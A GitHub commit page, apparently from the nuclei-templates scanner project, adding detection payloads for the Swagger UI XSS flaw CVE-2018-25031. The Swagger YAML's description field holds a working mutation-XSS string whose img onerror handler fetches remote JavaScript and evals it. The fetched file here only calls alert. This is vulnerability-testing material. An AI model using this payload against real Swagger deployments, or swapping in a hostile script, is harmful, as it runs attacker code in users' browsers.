Merge pull request #8682 from projectdiscovery/CVE-2018-25031

CVE 2018 25031 - Swagger Payload
projectdiscovery · Nov 23, 2023 · f9e0d76 · f9e0d76
2 parents 573be03 + 0ddcff2
commit f9e0d76
Show file tree

Hide file tree

Showing 2 changed files with 13 additions and 0 deletions.
diff --git a/helpers/payloads/CVE-2018-25031.js b/helpers/payloads/CVE-2018-25031.js
@@ -0,0 +1 @@
+alert(window.origin);
diff --git a/helpers/payloads/swagger-payload.yaml b/helpers/payloads/swagger-payload.yaml
@@ -0,0 +1,12 @@
+swagger: '2.0'
+info:
+  title: Classic API Resource Documentation
+  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=fetch(`https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/CVE-2018-25031.js`).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
+  version: production
+basePath: /JSSResource/
+produces:
+  - application/xml
+  - application/json
+consumes:
+  - application/xml
+  - application/json